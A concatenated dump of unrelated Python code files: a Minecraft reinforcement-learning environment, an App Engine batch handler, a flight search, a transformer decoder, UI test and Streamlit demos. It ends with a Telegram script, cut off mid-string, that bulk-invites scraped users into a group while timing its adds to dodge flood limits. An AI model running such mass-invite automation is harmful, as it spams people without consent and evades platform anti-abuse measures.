DESTINATION_Z\n self.cur_POSX, self.cur_POSZ = 0.5, 0.5\n self.pre_POSX, self.pre_POSZ = 0.5, 0.5\n\n def reset(self):\n \"\"\"\n Resets the environment for the next episode.\n Returns\n observation: flattened initial obseravtion\n \"\"\"\n # Reset Malmo\n world_state = self.init_malmo()\n\n # Reset Variables\n self.returns.append(self.episode_return)\n current_step = self.steps[-1] if len(self.steps) > 0 else 0\n self.steps.append(current_step + self.episode_step)\n self.episode_return = 0\n self.episode_step = 0\n\n # Log\n if len(self.returns) > self.log_frequency + 1 and \\\n len(self.returns) % self.log_frequency == 0:\n self.log_returns()\n\n # Get Observation\n self.obs, self.open_gate, self.jump_gate = self.get_observation(world_state)\n\n self.current_to_dest = DESTINATION_Z\n self.shortest_to_dest = DESTINATION_Z\n self.agent_host.sendCommand('chat /effect @p 7 3')\n self.agent_host.sendCommand('chat /gamerule naturalRegeneration false')\n time.sleep(1.0)\n\n return self.obs\n\n def init_malmo(self):\n \"\"\"\n Initialize new malmo mission.\n \"\"\"\n my_mission = MalmoPython.MissionSpec(self.GetXML(), True)\n my_mission_record = MalmoPython.MissionRecordSpec()\n my_mission.requestVideo(800, 500)\n my_mission.setViewpoint(1)\n\n max_retries = 3\n my_clients = MalmoPython.ClientPool()\n my_clients.add(MalmoPython.ClientInfo('127.0.0.1', 10000)) # add Minecraft machines here as available\n\n for retry in range(max_retries):\n try:\n self.agent_host.startMission(my_mission, my_clients, my_mission_record, 0, 'MatureRunner')\n break\n except RuntimeError as e:\n if retry == max_retries - 1:\n print(\"Error starting mission:\", e)\n exit(1)\n else:\n time.sleep(2)\n\n world_state = self.agent_host.getWorldState()\n while not world_state.has_mission_begun:\n time.sleep(0.1)\n world_state = self.agent_host.getWorldState()\n for error in world_state.errors:\n print(\"\\nError:\", error.text)\n\n return world_state\n\n def rotate(self, m, k): \n for l in range(4):\n top = 0\n bottom = self.obs_size - 1\n left = 0\n right = self.obs_size - 1\n while left < right and top < bottom: \n for i in range(k):\n prev = m[l][top+1][right] \n # Move top row one step left \n for i in range(right, left-1, -1): \n temp = m[l][top][i] \n m[l][top][i] = prev \n prev = temp \n # Move left column one step down \n for i in range(top, bottom+1): \n temp = m[l][i][left] \n m[l][i][left] = prev \n prev = temp \n # Move bottom row one step right \n for i in range(left, right+1): \n temp = m[l][bottom][i] \n m[l][bottom][i] = prev \n prev = temp \n # Move right column one step up \n for i in range(bottom, top-1, -1): \n temp = m[l][i][right] \n m[l][i][right] = prev \n prev = temp \n top += 1\n left += 1\n bottom -= 1\n right -= 1\n k -= 1\n return m\n\n def obs_diamond(self, agent_x, agent_z):\n # Get observation matrix and agent row/col\n sight = int((OBS_SIZE - 1) / 2)\n diamond_obs = np.zeros((OBS_SIZE, OBS_SIZE))\n agent_row = int(OBS_SIZE / 2)\n agent_col = int(OBS_SIZE / 2)\n\n # Mark diamond position 1\n for diamond_x, diamond_z in DIAMOND_POS:\n x_diff = diamond_x - int(agent_x)\n z_diff = diamond_z - int(agent_z)\n check_x = -sight <= x_diff <= sight\n check_z = -sight <= z_diff <= sight\n if check_x and check_z:\n diamond_row = z_diff + agent_row\n diamond_col = x_diff + agent_col\n diamond_obs[diamond_row, diamond_col] = 1\n\n return diamond_obs\n\n def update_diamond_list(self, agent_x, agent_z):\n flag = False\n for diamond_x, diamond_z in DIAMOND_POS:\n if diamond_x == agent_x and diamond_z == agent_z:\n DIAMOND_POS.remove((diamond_x, diamond_z))\n flag = True\n return flag\n\n def step(self, action):\n \"\"\"\n Take an action in the environment and return the results.\n Args\n action: index of the action to take\n Returns\n observation: flattened array of obseravtion\n reward: reward from taking action\n done: indicates terminal state\n info: dictionary of extra information\n \"\"\"\n\n # Get Action\n command = self.action_dict[action]\n if command not in ['use 1', 'jump 1', 'stop']:\n self.agent_host.sendCommand(command)\n time.sleep(0.1)\n elif (command == 'use 1' and self.open_gate) or \\\n (command == 'jump 1' and self.jump_gate):\n self.agent_host.sendCommand(command)\n time.sleep(0.1)\n elif command == 'stop':\n self.agent_host.sendCommand(\"use 0\")\n self.agent_host.sendCommand(\"jump 0\")\n self.agent_host.sendCommand(\"turn 0\")\n time.sleep(0.1)\n\n self.episode_step += 1\n\n # Get Observation\n old_dest = self.current_to_dest # Used for giving reward of moving to the destination\n old_shortest = self.shortest_to_dest\n world_state = self.agent_host.getWorldState()\n for error in world_state.errors:\n print(\"Error:\", error.text)\n self.obs, self.open_gate, self.jump_gate = self.get_observation(world_state)\n\n # Get Done\n done = not world_state.is_mission_running\n\n # Get Reward\n reward = 0\n for r in world_state.rewards:\n reward += r.getValue()\n\n # Reward of moving towards to the destination\n new_dest = self.current_to_dest\n new_shortest = self.shortest_to_dest\n if old_dest < new_dest:\n reward -= 0.5\n elif old_dest > new_dest:\n reward += 0.5\n\n if old_shortest < new_shortest:\n reward -= 1\n elif old_shortest > new_shortest:\n reward += 1\n\n self.episode_return += reward\n # Punish the agent if the agent remain stationary\n if math.sqrt((self.pre_POSX - self.cur_POSX) ** 2 +\n (self.pre_POSZ - self.cur_POSZ) ** 2) < 0.2:\n reward -= 0.2\n\n return self.obs, reward, done, dict()\n\n def get_observation(self, world_state):\n \"\"\"\n Use the agent observation API to get a flattened 2 x 5 x 5 grid around the agent.\n The agent is in the center square facing up.\n Args\n world_state: current agent world state\n Returns\n observation: the state observation\n allow_break_action: whether the agent is facing a diamond\n \"\"\"\n obs = np.zeros((4, self.obs_size, self.obs_size))\n open_gate = False\n jump_gate = False\n\n while world_state.is_mission_running:\n time.sleep(0.1)\n world_state = self.agent_host.getWorldState()\n if len(world_state.errors) > 0:\n raise AssertionError('Could not load grid.')\n\n if world_state.number_of_observations_since_last_state > 0:\n # First we get the json from the observation API\n msg = world_state.observations[-1].text\n observations = json.loads(msg)\n while 'floorAll' not in observations:\n time.sleep(.1) # maybe increment this each time it fails\n world_state = self.agent_host.getWorldState()\n msg = world_state.observations[-1].text\n observations = json.loads(msg)\n\n # Get observation\n # Get block typegrid.shape\n grid = observations['floorAll']\n\n # Get agent position\n agent_x = observations['XPos']\n agent_z = observations['ZPos']\n\n # update preivous postion and current position\n self.pre_POSX, self.pre_POSZ = self.cur_POSX, self.cur_POSZ\n self.cur_POSX, self.cur_POSZ = agent_x, agent_z\n\n # Update shortest distance to destination if current distance is shorter\n self.current_to_dest = DESTINATION_Z - agent_z\n if DESTINATION_Z - agent_z < self.shortest_to_dest:\n self.shortest_to_dest = DESTINATION_Z - agent_z\n\n obs_list = ['fence_gate', 'dark_oak_fence', 'acacia_fence']\n obs = list(self.obs_diamond(agent_x, agent_z).flatten())\n for i in range(len(obs_list)):\n for x in grid:\n if x == obs_list[i]:\n obs.append(1.0)\n else:\n obs.append(0.0)\n obs = np.array(obs)\n obs = obs.reshape((len(obs_list) + 1, self.obs_size, self.obs_size))\n\n # Remove collected diamond's position from the list to avoid repeat reward\n self.update_diamond_list(agent_x, agent_z)\n\n # Rotate observation with orientation of agent\n yaw = observations['Yaw']\n\n if yaw >= 202.5 and yaw < 247.5:\n obs = self.rotate(obs, 7)\n elif yaw >= 247.5 and yaw < 292.5:\n obs = np.rot90(obs, k=1, axes=(1, 2))\n elif yaw >= 292.5 and yaw < 337.5:\n obs = self.rotate(obs, 21)\n elif yaw >= 337.5 or yaw < 22.5:\n obs = np.rot90(obs, k=2, axes=(1, 2))\n elif yaw >= 22.5 and yaw < 67.5:\n obs = self.rotate(obs, 35)\n elif yaw >= 67.5 and yaw < 112.5:\n obs = np.rot90(obs, k=3, axes=(1, 2))\n elif yaw >= 112.5 and yaw < 157.5:\n obs = self.rotate(obs, 49)\n\n if 'LineOfSight' in observations.keys():\n open_gate = observations['LineOfSight']['type'] == \"fence_gate\"\n jump_gate = observations['LineOfSight']['type'] == \"acacia_fence\"\n\n break\n\n return obs, open_gate, jump_gate\n\n def GetXML(self):\n global DIAMOND_POS\n XMLmap, DIAMOND_POS = Map()\n return XMLmap\n\n def log_returns(self):\n \"\"\"\n Log the current returns as a graph and text file\n Args:\n steps (list): list of global steps after each episode\n returns (list): list of total return of each episode\n \"\"\"\n box = np.ones(self.log_frequency) / self.log_frequency\n returns_smooth = np.convolve(self.returns[1:], box, mode='same')\n plt.clf()\n plt.plot(self.steps[1:], returns_smooth)\n plt.title('Mature Runner')\n plt.ylabel('Return')\n plt.xlabel('Steps')\n plt.savefig('returns.png')\n\n with open('returns.txt', 'w') as f:\n for step, value in zip(self.steps[1:], self.returns[1:]):\n f.write(\"{}\\t{}\\n\".format(step, value))\n\n\nif __name__ == '__main__':\n\n ModelCatalog.register_custom_model('my_model', MyModel)\n\n ray.init()\n trainer = ppo.PPOTrainer(env=MinecraftRunner, config={\n 'env_config': {}, # No environment parameters to configure\n 'framework': 'torch', # Use pyotrch instead of tensorflow\n 'num_gpus': 0, # We aren't using GPUs\n 'num_workers': 0, # We aren't using parallelism\n 'model': {\n 'custom_model': 'my_model',\n 'custom_model_config': {}\n }\n\n })\n\n answer = input(\"Use last training result[Y/N]?\")\n if answer.lower() == \"y\":\n while True:\n dir_path = input(\"Training data path:\")\n if os.path.exists(dir_path):\n trainer.load_checkpoint(dir_path)\n break\n else:\n print(f\"Invalid path:{dir_path}\")\n\n current_directory = pathlib.Path(__file__).parent.absolute()\n\n i = 0\n while True:\n result = trainer.train()\n print(result)\n i += 1\n if i % 1 == 0:\n checkpoint = trainer.save_checkpoint(current_directory)\n print(\"checkpoint saved at\", checkpoint)","sub_path":"milestones/Runner1.py","file_name":"Runner1.py","file_ext":"py","file_size_in_byte":16023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26860331","text":"#!/usr/bin/python\n# coding: utf-8\n\n__author__ = 'Thang Nguyen (thangnguyen.ttd@gmail.com)'\n\nimport time\nimport os\nimport jinja2\ncwd = os.path.dirname(__file__)\npath = os.path.join(cwd, 'templates')\njinja_environment = jinja2.Environment(\n\t\tloader=jinja2.FileSystemLoader(path))\nimport webapp2\nimport time\nimport datetime\nimport logging\nimport json\nimport gdata.alt.appengine\nimport gdata.apps.service\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext import blobstore\nfrom google.appengine.api import users\nfrom google.appengine.api import namespace_manager\nfrom google.appengine.api import taskqueue\nfrom google.appengine.api.urlfetch import DownloadError\nfrom google.appengine.ext.db.metadata import Namespace\nfrom gdata.apps.service import AppsForYourDomainException\nfrom google.appengine.api import memcache\n\nimport sateraito_inc\nimport sateraito_page\nimport sateraito_func\nimport sateraito_db\n\n# prepare for max 500,000 namespaces\nNUM_PER_PAGE_NAMESPACE = 500\nMAX_PAGES_NAMESPACE = 1000\n\nfrom os.path import join, dirname, abspath\nROOT = abspath(dirname(__file__))\nfrom jinja2 import Environment, FileSystemLoader\n\nfrom faker import Faker\nfrom faker.factory import Factory\nfake = Faker()\nfake = Faker('en_US')\n\nfrom generate import GenerateDataHandler\n\nclass TqGeneralData(sateraito_page._BasePage):\n\tdef post(self):\n\t\t# check retry count\n\t\tretry_cnt = self.request.headers.environ['HTTP_X_APPENGINE_TASKRETRYCOUNT']\n\t\tlogging.info('retry_cnt=' + str(retry_cnt))\n\t\tif retry_cnt is not None:\n\t\t\tif(int(retry_cnt) > 3):\n\t\t\t\tlogging.error('error over_3_times.')\n\t\t\t\treturn\n\t\t# get param\n\t\tgenerate = self.request.get('generate', '')\n\t\tlogging.info('generate=' + str(generate))\n\n\t\tlogging.info('** start TqGeneralData')\n\n\t\tif generate != '':\n\t\t\tif generate == 'province':\n\t\t\t\tobjClass = GenerateDataHandler()\n\t\t\t\tobjClass.generate_provinces()\n\t\t\telif generate == 'district':\n\t\t\t\tobjClass.generate_districts()\n\t\t\t\tself.generate_districts(fake)\n\t\t\telif generate == 'ward':\n\t\t\t\tobjClass = GenerateDataHandler()\n\t\t\t\tobjClass.generate_districts()\n\n\t\t\tlogging.info('** FINISHED TqGeneralData')\n\t\t\treturn\n\n\t\tlogging.info('an error generate')\n\nclass StartGenerateData(sateraito_page._BasePage):\n\n\tdef callTaskQueue(self, task_url, task_params={}):\n\t\tdefault_q = taskqueue.Queue('default')\n\t\tt = taskqueue.Task(\n\t\t\turl=task_url,\n\t\t\tparams=task_params,\n\t\t\ttarget='default',\n\t\t\tcountdown=(1)\n\t\t)\n\t\tdefault_q.add(t)\n\n\tdef get(self):\n\t\t# set namespace\n\t\tif not self.setNamespace():\n\t\t\treturn\n\n\t\tif not self.isSuperAdmin(redirect_login=True):\n\t\t\tself.response.set_status(403)\n\t\t\treturn\n\n\t\t# check oid request\n\n\t\ttask_url = '/batch/tq/generatedata'\n\t\ttask_params = {\n\t\t\t'generate': 'province'\n\t\t}\n\t\tself.callTaskQueue(task_url, task_params)\n\n\t\ttask_url = '/batch/tq/generatedata'\n\t\ttask_params = {\n\t\t\t'generate': 'district'\n\t\t}\n\t\tself.callTaskQueue(task_url, task_params)\n\n\t\ttask_url = '/batch/tq/generatedata'\n\t\ttask_params = {\n\t\t\t'generate': 'ward'\n\t\t}\n\t\tself.callTaskQueue(task_url, task_params)\n\n\t\t# set response header\n\t\tself.response.headers['Content-Type'] = 'application/json'\n\t\tself.response.out.write(json.JSONEncoder().encode({'status': 'ok'}))\n\napp = ndb.toplevel(webapp2.WSGIApplication([\n\t\t\t\t\t\t\t('/batch/startgeneratedata$', StartGenerateData),\n\t\t\t\t\t\t\t('/batch/tq/generatedata$', TqGeneralData),\n\t\t\t\t\t\t\t], debug=sateraito_inc.debug_mode, config=sateraito_page.config))\n","sub_path":"src/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"531579000","text":"#This file will need to use the DataManager,FlightSearch, FlightData, NotificationManager classes to achieve the program requirements.\nfrom datetime import timedelta, date\nfrom flight_data import FlightData\nfrom flight_search import FlightSearch\n\ndeparture = input(\"What city will you be departing from: \")\ndestination = input(\"What city is your destination: \")\n\nnewFlight = FlightData(departure, destination)\nnewFlightDets = newFlight.constructor()\n\nnewSearch = FlightSearch()\ncodes = newSearch.find_codes(newFlightDets[\"Departure\"], newFlightDets[\"Destination\"])\n\ntoday = date.today()\ntommorow = today + timedelta(days=1)\nnextSixMonths = tommorow + timedelta(days=6*30)\ntommorow = tommorow.strftime(\"%d/%m/%Y\")\nnextSixMonths = nextSixMonths.strftime(\"%d/%m/%Y\")\n\nresult = newSearch.find_flights(codes[0], codes[1], tommorow, nextSixMonths)\nprint(result)\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"382501176","text":"my_list = list('Perl')\n\nmy_list[2:] = list('ar')\n\nprint(my_list) # ['P', 'e', 'a', 'r']\n\n# When you use slice assignments, you may also replace the slice with a sequence whose length.py is different from\n# that of the original.\n\nmy_list = list('Perl')\nmy_list[1:] = list('ython')\n\nprint(my_list) # ['P', 'y', 't', 'h', 'o', 'n']\n\n# Slice assignments can be used to insert elements without replacing any of the original ones.\n\nmy_list = [1,5]\nmy_list[1:1] = [2,3,4]\n\nprint(my_list) # [1, 2, 3, 4, 5]\n\n# You can do the reverse to delete a slice.\n\nmy_list[1:4] = []\n\nprint(my_list) # [1, 5]\n\n","sub_path":"Python/lang/data_structures/lists/modifying/replace-with-slices.py","file_name":"replace-with-slices.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278908827","text":"#!/usr/bin/env python3\r\n\"\"\"\r\nclass Decoder\r\n\"\"\"\r\nimport tensorflow as tf\r\npositional_encoding = __import__('4-positional_encoding').positional_encoding\r\nDecoderBlock = __import__('8-transformer_decoder_block').DecoderBlock\r\n\r\n\r\nclass Decoder(tf.keras.layers.Layer):\r\n \"\"\"Class Decoder\"\"\"\r\n def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len,\r\n drop_rate=0.1):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n N - the number of blocks in the encoder\r\n dm - the dimensionality of the model\r\n h - the number of heads\r\n hidden - the number of hidden units in the fully connected layer\r\n target_vocab - the size of the target vocabulary\r\n max_seq_len - the maximum sequence length possible\r\n drop_rate - the dropout rate\r\n Sets the following public instance attributes:\r\n N - the number of blocks in the encoder\r\n dm - the dimensionality of the model\r\n embedding - the embedding layer for the targets\r\n positional_encoding - a numpy.ndarray of shape (max_seq_len, dm)\r\n containing the positional encodings\r\n blocks - a list of length N containing all of the DecoderBlock‘s\r\n dropout - the dropout layer, to be applied to the positional encodings\r\n Returns\r\n -------\r\n None\r\n \"\"\"\r\n super(Decoder, self).__init__()\r\n self.N = N\r\n self.dm = dm\r\n self.embedding = tf.keras.layers.Embedding(target_vocab, dm)\r\n self.positional_encoding = positional_encoding(max_seq_len, dm)\r\n self.blocks = [DecoderBlock(dm, h, hidden, drop_rate)] * N\r\n self.dropout = tf.keras.layers.Dropout(drop_rate)\r\n\r\n def call(self, x, encoder_output, training,\r\n look_ahead_mask, padding_mask):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n Public instance method\r\n x - a tensor of shape (batch, target_seq_len, dm)containing the input\r\n to the decoder\r\n encoder_output - a tensor of shape (batch, input_seq_len, dm)containing\r\n the output of the encoder\r\n training - a boolean to determine if the model is training\r\n look_ahead_mask - the mask to be applied to the first multi head\r\n attention layer\r\n padding_mask - the mask to be applied to the second multi head\r\n attention layer\r\n\r\n Returns\r\n -------\r\n A tensor of shape (batch, target_seq_len, dm) containing the\r\n decoder output\r\n \"\"\"\r\n seq_len = x.shape[1]\r\n # embbeding to input x\r\n x = self.embedding(x)\r\n # scale x with sqr of dm\r\n x = x * tf.math.sqrt(tf.cast(self.dm, tf.float32))\r\n # sum of positional encoding\r\n x = x + self.positional_encoding[:seq_len]\r\n # dropout to everyhting\r\n output = self.dropout(x, training=training)\r\n for i in range(self.N):\r\n output = self.blocks[i](output, encoder_output, training,\r\n look_ahead_mask, padding_mask)\r\n return output\r\n","sub_path":"supervised_learning/0x11-attention/10-transformer_decoder.py","file_name":"10-transformer_decoder.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"486340653","text":"# -*- coding: utf-8 -*-\n'''\n@ Copyright (C) 2018 EfonFighting(email:efonfighting@126.com)(android_wechat:Efon-fighting)\n@\n@ env stetup:\n@ sudo apt-get install python3-pip\n@\n'''\n\ndef main():\n print(\"main start\")\n caseFlg = 'url2pdf'\n print(caseFlg)\n\n if (caseFlg == 'douyin'):\n from android_douyin import douyin\n urlTxtPath = \"/home/soy/03_autoOpt_docs/douyin_Ina.txt\"\n douyin.getUrlFromDouyin(urlTxtPath)\n #douyin.getVideoFromTxt(\"out/douyin_Sia.txt\", 1, 80)\n #douyin.uploadVideo2Qunmin('/home/soy/Videos/sihaiweijiazaiouzhou/sihaiweijiazaiouzhou.txt',\n # '/home/soy/Videos/sihaiweijiazaiouzhou',26, 29)\n\n\n if(caseFlg == 'getPointAxis'):\n from pc_windows import screen_coordinate\n screen_coordinate.getPointAxis()\n\n if(caseFlg == 'getEssay'):\n from android_wechat import get_gzh_essay\n get_gzh_essay.getEssay('out/laodongfaku.txt',False)\n\n if (caseFlg == 'url2pdf'):\n from url2pdf import url2pdf\n url2pdf.url2pdfLinux(\"out/laodongfaku.txt\", 101, 10000)\n\n\ndef test():\n import time\n # 获取描述\n urlTxtFd = open('out/抖音_四海为家在欧洲.txt', 'r', encoding='utf-8')\n lineTemps = urlTxtFd.readlines()\n for lineTemp in lineTemps:\n findRet = lineTemp.find('005')\n print(findRet)\n if(findRet != -1):\n print(lineTemp)\n time.sleep(1)\n\n\nif __name__ == \"__main__\": #这里可以判断,当前文件是否是直接被python调用执行\n main()\n #test()\n\n","sub_path":"auto_opt_main.py","file_name":"auto_opt_main.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25820032","text":"#! /usr/bin/env python\nfrom __future__ import print_function\nimport sys\nimport commands\nline = sys.stdin.read()\nif \"/*\" and \"*/\" in line:\n\tline = line.replace('/*','')\n\tline = line.replace('*/','')\n\tmsg = \"Code block in selection uncommented\"\nelse:\n\tline = \"/*\" + line\n\tline = line + \"*/\"\n\tmsg = \"Code block in selection commented\"\nsys.stdout.write(line)\nexit(msg)\n\n## Set gedit external tools params as below:\n## \"Save\" ==> \"Current Document\"\n## \"Input\" ==> \"Current Selection\"\n## \"Output\" ==> \"Replace Current Selection\"\n","sub_path":"mysql_block_comment_toggle.py","file_name":"mysql_block_comment_toggle.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500224736","text":"from Base.BaseElementEnmu import Element as be\nfrom Base.BaseOperate import OperateElement\nfrom Base.BaseYaml import getYam\nfrom PageObject.SumResult import statistics_result\n\n\nclass HistorySwipeDelPage:\n\n def __init__(self, kwargs):\n self.driver = kwargs[\"driver\"]\n if kwargs.get(\"launch_app\", \"0\") == \"0\":\n self.driver.launch_app()\n self.path = kwargs[\"path\"]\n self.operateElement = OperateElement(self.driver)\n self.isOperate = True\n test_msg = getYam(self.path)\n self.testInfo = test_msg[\"testinfo\"]\n self.testCase = test_msg[\"testcase\"]\n self.testcheck = test_msg[\"check\"]\n self.device = kwargs[\"device\"]\n self.logTest = kwargs[\"logTest\"]\n self.caseName = kwargs[\"caseName\"]\n self.get_value = []\n self.msg = \"\"\n\n def operate(self):\n for item in self.testCase:\n\n result = self.operateElement.operate(item, self.testInfo, self.logTest, self.device)\n if not result[\"result\"]:\n msg = \"Falló durante la ejecución, verifique si el elemento existe\" + item[\"element_info\"]\n m_s_g = self.msg + \"\\n\" if self.msg != \"\" else \"\"\n self.msg = m_s_g + msg\n print(msg)\n self.testInfo[0][\"msg\"] = msg\n self.isOperate = False\n return False\n\n if item.get(\"operate_type\", \"0\") == be.SWIPE_LEFT:\n web_element = self.driver.find_elements_by_id(item[\"element_info\"])[item[\"index\"]]\n start = web_element.location\n\n startx = start[\"x\"]\n starty = start[\"y\"]\n\n size1 = web_element.size\n\n width = size1[\"width\"]\n height = size1[\"height\"]\n\n endX = width + startx\n endY = height + starty\n self.driver.swipe(endX, endY, starty, endY)\n if item.get(\"operate_type\", \"0\") == be.GET_VALUE:\n self.get_value.append(result['text'])\n return True\n\n def checkPoint(self, kwargs={}):\n result = self.check()\n if result is not True and be.RE_CONNECT:\n self.msg = \"El caso de uso falló y se volvió a conectar una vez, el motivo del fallo:\" + self.testInfo[0][\n \"msg\"]\n self.logTest.buildStartLine(self.caseName + \"_No se pudo volver a conectar\")\n self.operateElement.switchToNative()\n self.driver.launch_app()\n self.isOperate = True\n self.get_value = []\n self.operate()\n result = self.check()\n self.testInfo[0][\"msg\"] = self.msg\n statistics_result(result=result, testInfo=self.testInfo, caseName=self.caseName,\n driver=self.driver, logTest=self.logTest, devices=self.device,\n testCase=self.testCase,\n testCheck=self.testcheck)\n return result\n\n def check(self, kwargs={}):\n result = True\n m_s_g = self.msg + \"\\n\" if self.msg != \"\" else \"\"\n\n if self.isOperate:\n for item in self.testcheck:\n resp = self.operateElement.operate(item, self.testInfo, self.logTest, self.device)\n if not resp[\"result\"]:\n msg = \"Por favor marque el elemento\" + item[\"element_info\"] + \"existe\"\n self.msg = m_s_g + msg\n print(msg)\n self.testInfo[0][\"msg\"] = msg\n result = False\n if resp[\"text\"] in self.get_value:\n msg = \"Error en la eliminación de datos, los datos antes de la eliminación son: \" + \".\".join(\n self.get_value) + \"Los datos adquiridos actualmente son:\" + resp[\"text\"]\n self.msg = m_s_g + msg\n print(msg)\n self.testInfo[0][\"msg\"] = msg\n break\n else:\n result = False\n return result\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"PageObject/Home/HistorySwipeDellPage.py","file_name":"HistorySwipeDellPage.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26203879","text":"import streamlit as st\nimport extra_streamlit_components as stx\n\n\ndef show_cookie_manager_controls():\n st.write(\"# Cookie Manager\")\n\n cookie_manager = stx.CookieManager()\n\n st.subheader(\"All Cookies:\")\n\n cookies = cookie_manager.get_all()\n st.write(cookies)\n\n c1, c2, c3 = st.columns(3)\n\n with c1:\n st.subheader(\"Get Cookie:\")\n cookie = st.text_input(\"Cookie\", key=\"0\")\n\n clicked = st.button(\"Get\")\n\n if clicked:\n value = cookie_manager.get(cookie)\n st.write(value)\n with c2:\n st.subheader(\"Set Cookie:\")\n cookie = st.text_input(\"Cookie\", key=\"1\")\n val = st.text_input(\"Value\")\n\n if st.button(\"Add\"):\n cookie_manager.set(cookie, val)\n\n with c3:\n st.subheader(\"Delete Cookie:\")\n cookie = st.text_input(\"Cookie\", key=\"2\")\n\n if st.button(\"Delete\"):\n cookie_manager.delete(cookie)\n\n\ndef show_bouncing_image():\n st.write(\"# Bouncing Image\")\n\n image_url = \"https://streamlit.io/images/brand/streamlit-logo-secondary-colormark-darktext.svg\"\n stx.bouncing_image(image_source=image_url, animate=True, animation_time=2000, height=145, width=500)\n\n st.code(\"\"\"\n image_url = \"https://streamlit.io/images/brand/streamlit-logo-secondary-colormark-darktext.svg\"\n stx.bouncing_image(image_source=image_url, animate=True, animation_time=2000, height=145, width=500)\n \"\"\")\n\n\ndef show_top_bar():\n st.write(\"# Top Bar\")\n\n chosen_id = stx.tab_bar(data=[\n stx.TabBarItemData(id=1, title=\"ToDo\", description=\"Tasks to take care of\"),\n stx.TabBarItemData(id=2, title=\"Done\", description=\"Tasks taken care of\"),\n stx.TabBarItemData(id=3, title=\"Overdue\", description=\"Tasks missed out\"),\n ], default=1, return_type=int)\n\n st.info(f\"chosen_id = {chosen_id}, type = {type(chosen_id)}\")\n\n st.code(\"\"\"\n chosen_id = stx.tab_bar(data=[\n stx.TabBarItemData(id=1, title=\"ToDo\", description=\"Tasks to take care of\"),\n stx.TabBarItemData(id=2, title=\"Done\", description=\"Tasks taken care of\"),\n stx.TabBarItemData(id=3, title=\"Overdue\", description=\"Tasks missed out\"),\n ], default=1)\n \"\"\")\n\n\ndef show_stepper_bar():\n st.write(\"# Stepper Bar\")\n\n val = stx.stepper_bar(steps=[\"Ready\", \"Get Set\", \"Go\"])\n st.info(f\"Phase #{val}\")\n\n st.code(\"\"\"\n val = stx.stepper_bar(steps=[\"Ready\", \"Get Set\", \"Go\"])\n \"\"\")\n\n\nshow_cookie_manager_controls()\nst.write(\"_______\")\nshow_top_bar()\nst.write(\"_______\")\nshow_bouncing_image()\nst.write(\"_______\")\nshow_stepper_bar()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114608587","text":"from telethon.sync import TelegramClient\nfrom telethon.tl.functions.messages import GetDialogsRequest\nfrom telethon.tl.types import InputPeerEmpty, InputPeerChannel, InputPeerUser\nfrom telethon.errors.rpcerrorlist import (PeerFloodError,\n UserChannelsTooMuchError,\n UserPrivacyRestrictedError,\n SessionPasswordNeededError,\n ChatWriteForbiddenError)\nfrom telethon.tl.functions.channels import InviteToChannelRequest\nimport sys\nimport csv\nimport traceback\nimport time\nimport random\n\nfrom constant import API_HASH, APP_ID, PASSWORD, PHONE_NO\n\napi_id = APP_ID\napi_hash = API_HASH\nphone = PHONE_NO\nclient = TelegramClient(phone, api_id, api_hash)\n\nclient.connect()\nif not client.is_user_authorized():\n client.send_code_request(phone)\n try:\n client.sign_in(phone, input('Enter the code: '))\n except SessionPasswordNeededError:\n client.sign_in(password=PASSWORD)\n\ninput_file = sys.argv[1]\nusers = []\nwith open(input_file, encoding='UTF-8') as f:\n rows = csv.reader(f, delimiter=\",\", lineterminator=\"\\n\")\n next(rows, None)\n for row in rows:\n user = {}\n user['username'] = row[0]\n user['user_id'] = int(row[1])\n user['access_hash'] = int(row[2])\n user['name'] = row[3]\n user[\"group\"] = row[4]\n user[\"group_id\"] = int(row[5])\n user[\"phone_number\"] = (row[6])\n users.append(user)\n\nchats = []\nlast_date = None\nchunk_size = 200\ngroups = []\n\nresult = client(\n GetDialogsRequest(offset_date=last_date,\n offset_id=0,\n offset_peer=InputPeerEmpty(),\n limit=chunk_size,\n hash=0))\nchats.extend(result.chats)\n\nfor chat in chats:\n try:\n if chat.megagroup == True:\n groups.append(chat)\n if chat.broadcast == True:\n groups.append(chat)\n except:\n continue\n\nprint('Choose a group to add members:')\ni = 0\nfor group in groups:\n print(str(i) + '- ' + group.title)\n i += 1\n\ng_index = input(\"Enter a Number: \")\ntarget_group = groups[int(g_index)]\n\ntarget_group_entity = InputPeerChannel(target_group.id,\n target_group.access_hash)\n\nmode = int(input(\"Enter 1 to add by username or 2 to add by ID: \"))\n\nn = 0\n\nfor user in users:\n n += 1\n if n % 50 == 0:\n time.sleep(900)\n try:\n print(\"Adding {}\".format(user['user_id']))\n if mode == 1:\n if user['username'] == \"\":\n continue\n user_to_add = client.get_input_entity(user['username'])\n elif mode == 2:\n user_to_add = InputPeerUser(user['user_id'], user['access_hash'])\n else:\n sys.exit(\"Invalid Mode Selected. Please Try Again.\")\n client(InviteToChannelRequest(target_group_entity, [user_to_add]))\n print(\"Waiting for 60-180 Seconds...\")\n time.sleep(random.randrange(60, 180))\n except PeerFloodError:\n print(\n \"Getting Flood Error from telegram. Script is stopping now. Please try again after some time.\"\n )\n except UserPrivacyRestrictedError:\n print(\n 